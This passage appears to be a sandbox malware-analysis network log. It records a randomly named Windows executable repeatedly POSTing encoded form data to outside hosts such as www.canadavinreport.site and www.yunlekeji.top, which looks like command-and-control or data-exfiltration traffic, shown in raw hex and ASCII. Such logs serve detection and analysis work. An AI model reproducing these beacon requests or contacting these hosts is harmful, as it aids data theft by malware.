Jan 11, 2025 02:51:24.633107901 CET	657	OUT	POST /g3h7/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.canadavinreport.site Origin: http://www.canadavinreport.site Referer: http://www.canadavinreport.site/g3h7/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 51 77 43 32 39 6c 67 76 46 79 30 64 58 5a 4a 63 73 69 6f 65 6b 4e 69 68 5a 54 5a 61 36 39 71 76 77 7a 54 66 53 76 59 42 69 65 55 70 47 65 64 46 2b 41 76 71 44 78 47 41 66 4f 64 45 48 54 5a 38 71 79 77 51 62 4c 4d 6e 4f 67 6d 7a 4f 56 72 41 6a 78 49 75 4f 73 4d 77 4f 76 75 63 4a 64 6a 6f 42 78 72 4b 54 66 56 75 55 44 31 57 79 32 38 33 4a 53 66 75 5a 59 41 41 47 41 30 32 4a 59 73 47 7a 36 67 56 4e 5a 65 46 65 59 45 43 46 30 34 44 4a 4b 5a 6e 42 2b 72 64 47 55 6f 42 6e 4a 4c 53 69 42 75 2f 56 67 47 6c 74 61 43 64 6f 59 2b 6b 55 6b 4a 64 56 59 54 37 74 34 7a 55 4d 7a 6e 76 4b 59 49 46 4a 58 51 3d Data Ascii: T0JX6z9=QwC29lgvFy0dXZJcsioekNihZTZa69qvwzTfSvYBieUpGedF+AvqDxGAfOdEHTZ8qywQbLMnOgmzOVrAjxIuOsMwOvucJdjoBxrKTfVuUD1Wy283JSfuZYAAGA02JYsGz6gVNZeFeYECF04DJKZnB+rdGUoBnJLSiBu/VgGltaCdoY+kUkJdVYT7t4zUMznvKYIFJXQ=
Jan 11, 2025 02:51:25.250773907 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 01:51:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c c5 bc 54 5c 58 6d 78 9c 1b 27 52 16 bb 44 38 2d 0a 9e 14 85 73 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED] Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc\|`,<pwm0$QAMKqwx[Z1M$F~~n_{9\|.w>\|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~T\Xmx'RD8-s-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1F[D=Hp(y.Ek"%3HO%/7.>h2G/JAdJ[hV$:R0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49969	185.27.134.206	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:27.178253889 CET	677	OUT	POST /g3h7/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.canadavinreport.site Origin: http://www.canadavinreport.site Referer: http://www.canadavinreport.site/g3h7/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 41 70 48 39 4a 46 73 52 76 71 45 78 47 41 48 2b 64 64 44 54 59 2b 71 79 38 75 62 4c 67 6e 4f 67 79 7a 4f 56 62 41 6a 47 38 76 55 63 4d 79 47 50 75 65 48 39 6a 6f 42 78 72 4b 54 66 52 45 55 44 74 57 79 48 4d 33 4a 7a 66 74 48 49 41 44 42 41 30 32 43 34 73 61 7a 36 67 33 4e 62 71 76 65 61 38 43 46 30 6f 44 4a 66 74 6f 55 4f 72 62 43 55 70 33 76 38 75 37 6a 57 75 42 4a 77 54 44 72 64 69 44 67 4f 50 4f 4f 47 42 62 57 59 37 51 74 37 62 69 4a 45 36 48 51 37 59 31 58 41 48 48 78 55 36 31 4c 75 42 6b 76 4b 65 6c 42 49 53 42 6f 32 56 4a Data Ascii: T0JX6z9=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0RisApH9JFsRvqExGAH+ddDTY+qy8ubLgnOgyzOVbAjG8vUcMyGPueH9joBxrKTfREUDtWyHM3JzftHIADBA02C4saz6g3Nbqvea8CF0oDJftoUOrbCUp3v8u7jWuBJwTDrdiDgOPOOGBbWY7Qt7biJE6HQ7Y1XAHHxU61LuBkvKelBISBo2VJ
Jan 11, 2025 02:51:27.778774023 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 01:51:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c c5 bc 54 5c 58 6d 78 9c 1b 27 52 16 bb 44 38 2d 0a 9e 14 85 73 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED] Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc\|`,<pwm0$QAMKqwx[Z1M$F~~n_{9\|.w>\|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~T\Xmx'RD8-s-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1F[D=Hp(y.Ek"%3HO%/7.>h2G/JAdJ[hV$:R0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49986	185.27.134.206	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:29.925056934 CET	1694	OUT	POST /g3h7/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.canadavinreport.site Origin: http://www.canadavinreport.site Referer: http://www.canadavinreport.site/g3h7/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 51 77 43 32 39 6c 67 76 46 79 30 64 46 70 35 63 74 46 38 65 69 74 69 6d 46 44 5a 61 77 64 71 72 77 7a 58 66 53 74 30 52 69 73 34 70 47 50 52 46 2b 69 33 71 46 78 47 41 5a 4f 64 41 44 54 59 2f 71 79 30 71 62 4c 63 64 4f 6b 43 7a 50 30 37 41 6c 30 55 76 61 73 4d 79 4b 76 75 44 4a 64 6a 48 42 77 48 47 54 66 42 45 55 44 74 57 79 45 6b 33 4c 69 66 74 46 49 41 41 47 41 30 36 4a 59 73 6d 7a 36 34 4e 4e 59 47 56 65 75 41 43 45 51 30 44 4c 74 31 6f 57 75 72 5a 50 30 70 2f 76 38 71 67 6a 51 4b 4e 4a 77 6d 6d 72 62 53 44 71 50 53 33 63 33 45 41 46 6f 72 5a 71 59 62 2b 46 6c 36 6f 56 61 45 68 55 42 6a 67 2b 42 57 68 4d 66 46 51 6a 72 66 72 61 4a 53 41 71 79 35 41 7a 72 32 6b 55 66 65 4e 57 52 57 48 59 63 6a 67 58 75 79 74 73 36 52 52 56 72 73 70 63 2f 31 6d 53 44 48 66 59 64 75 6b 6c 76 65 53 50 61 62 39 7a 71 45 79 54 62 59 67 46 44 37 6f 69 43 79 55 4b 47 5a 30 35 38 54 47 66 73 51 36 4b 32 6d 61 6c 68 34 78 38 6a 2f 64 62 2f 45 4f 51 44 4f 4e 54 79 43 36 66 70 44 79 57 63 74 65 63 63 [TRUNCATED] Data Ascii: T0JX6z9=QwC29lgvFy0dFp5ctF8eitimFDZawdqrwzXfSt0Ris4pGPRF+i3qFxGAZOdADTY/qy0qbLcdOkCzP07Al0UvasMyKvuDJdjHBwHGTfBEUDtWyEk3LiftFIAAGA06JYsmz64NNYGVeuACEQ0DLt1oWurZP0p/v8qgjQKNJwmmrbSDqPS3c3EAForZqYb+Fl6oVaEhUBjg+BWhMfFQjrfraJSAqy5Azr2kUfeNWRWHYcjgXuyts6RRVrspc/1mSDHfYduklveSPab9zqEyTbYgFD7oiCyUKGZ058TGfsQ6K2malh4x8j/db/EOQDONTyC6fpDyWcteccGWLn99W6SQBuSXYcuxX40SaoH7rO+y2iOCnrRdWE+QxftWDhP/wF/ntsztKSbHDyRd5JqSD1ShNm1YInQ9fhPblz0fqBOSnm0kGENQp04DvM2GNnEEtJ1YgVJ8swGzS0XpZs3CEq5NLkDp+wyXJWy+VSgR7N/XnvxoLxlJ4GL1oeGLJzIDhUbK0M4gvdvY91p+iSnu+Q/b1L5ltzzSrmAef7fVNFRMNzcxb05W89gL1nm4CyO/UDysER+M6qNOUvXcVMVdmzy7CSnIgmUOu8A5TCRshRbL7DkMU5zj2Qbhsq3UuzuECNosvH52B3KPDzc3SUElzqNFzufcqa1rdrSBeoM/NZPkColUiXf4WkxepdX6LC6f2+FxAHtxo3VgNJyiU7qFDxirPHK6azlRWxnfYamWn1UcUMlY0PqtEwKGqxZchth3glUdns92FKXUcAsLTo4AWXlM8H4F3oP/bkRlxXvDCd3VApKiGDHqBsDThzRch/laI7kFqq4ETEXokRp+dvnud9ybEYrp/0JeGDb4G+grA0+yrC4ruikP2jnbuDtJwaoKvRwMzqKa2lOqViIrwXxVoKyuFtlrWEx31tXk5kbgwqoECuxYdnL71EjkWHEpfbT9V+QTUr0Kk3VFvyUP+2n/53GkC6zyOpP0nOJ9cGvVKlYw2LtY [TRUNCATED]
Jan 11, 2025 02:51:30.522469044 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 01:51:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c c5 bc 54 5c 58 6d 78 9c 1b 27 52 16 bb 44 38 2d 0a 9e 14 85 73 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED] Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc\|`,<pwm0$QAMKqwx[Z1M$F~~n_{9\|.w>\|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~T\Xmx'RD8-s-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1F[D=Hp(y.Ek"%3HO%/7.>h2G/JAdJ[hV$:R0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49987	185.27.134.206	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:32.513969898 CET	383	OUT	GET /g3h7/?T0JX6z9=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&Ih6=GzF8v0ph3F HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.canadavinreport.site User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 02:51:33.106364012 CET	1197	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 01:51:33 GMT Content-Type: text/html Content-Length: 996 Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED] Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("3068b69ecd604df9250f19fc976177ff");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?T0JX6z9=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&Ih6=GzF8v0ph3F&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49988	165.154.96.210	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:39.263729095 CET	636	OUT	POST /t322/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.yunlekeji.top Origin: http://www.yunlekeji.top Referer: http://www.yunlekeji.top/t322/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 65 48 2f 6d 2b 57 65 79 50 64 6f 37 58 5a 6f 50 43 7a 71 43 6d 78 53 30 5a 79 76 6d 67 45 70 33 46 4b 77 6b 6a 53 4b 6e 6d 74 43 34 4f 56 2b 6c 42 79 49 35 51 53 48 31 6f 7a 49 58 2b 2f 32 61 35 6b 58 61 64 54 58 36 57 66 46 67 76 50 33 78 62 76 62 72 6c 2f 4b 65 46 34 57 6d 45 78 67 2b 43 56 43 44 48 6a 61 6e 49 59 4c 46 38 61 33 31 78 75 6c 62 52 5a 71 53 70 45 45 49 2f 6d 66 43 2f 4d 75 67 55 72 57 55 66 37 49 53 52 36 74 4d 63 36 56 62 37 56 42 54 66 74 6a 64 57 6f 52 59 54 4c 69 46 42 6b 36 6d 41 32 42 79 6a 31 5a 6b 74 6c 65 7a 78 59 6f 64 4e 61 6f 3d Data Ascii: T0JX6z9=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb7VBTftjdWoRYTLiFBk6mA2Byj1ZktlezxYodNao=
Jan 11, 2025 02:51:40.201755047 CET	1236	IN	HTTP/1.1 404 Not Found Server: F-WEB Date: Sat, 11 Jan 2025 01:51:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 910 Connection: close FAI-W-FLOW: 90789038 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 FAI-W-AGENT_AID: 32663896 Update-Time: 1736399500 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Frame-Options: SAMEORIGIN Set-Cookie: _cliid=fcBsX7AbV_wG1TsB; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 01:51:40 GMT; HttpOnly Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 01:51:40 GMT; HttpOnly Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <d
Jan 11, 2025 02:51:40.201776028 CET	424	IN	Data Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 Data Ascii: iv class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="bac

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49989	165.154.96.210	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:51:41.808140039 CET	656	OUT	POST /t322/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.yunlekeji.top Origin: http://www.yunlekeji.top Referer: http://www.yunlekeji.top/t322/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 78 33 46 71 67 6b 69 54 4b 6e 68 74 43 34 64 56 2f 76 50 53 49 75 51 53 44 58 6f 32 49 58 2b 2b 57 61 35 6c 48 61 64 67 50 35 58 50 46 69 6e 76 33 33 56 50 62 72 6c 2f 4b 65 46 34 71 63 45 78 6f 2b 43 67 53 44 48 47 6d 67 4a 59 4c 45 37 61 33 31 37 4f 6b 53 52 5a 71 73 70 42 63 75 2f 6c 6e 43 2f 50 36 67 56 2b 69 58 55 37 4a 62 4a 61 73 6a 4e 37 34 2f 37 47 64 33 42 50 76 74 51 35 31 37 66 64 54 76 62 47 79 67 44 32 70 5a 6a 32 78 53 6f 53 44 62 72 37 34 74 54 4e 2b 30 31 76 6c 43 59 38 47 61 41 77 76 67 76 4a 6a 50 47 56 43 52 Data Ascii: T0JX6z9=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2pZj2xSoSDbr74tTN+01vlCY8GaAwvgvJjPGVCR
Jan 11, 2025 02:51:42.729742050 CET	1236	IN	HTTP/1.1 404 Not Found Server: F-WEB Date: Sat, 11 Jan 2025 01:51:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 910 Connection: close FAI-W-FLOW: 90938038 Service-Lane: e8594f12d42b28ee5775cc58b9d2e933 FAI-W-AGENT_AID: 32663896 Update-Time: 1736399500 Src-Update: true P3P: CP=CAO PSA OUR Origin-Agent-Cluster: ?0 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Frame-Options: SAMEORIGIN Set-Cookie: _cliid=nSCOZ4gjGaJIxigS; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 01:51:42 GMT; HttpOnly Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 01:51:42 GMT; HttpOnly Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 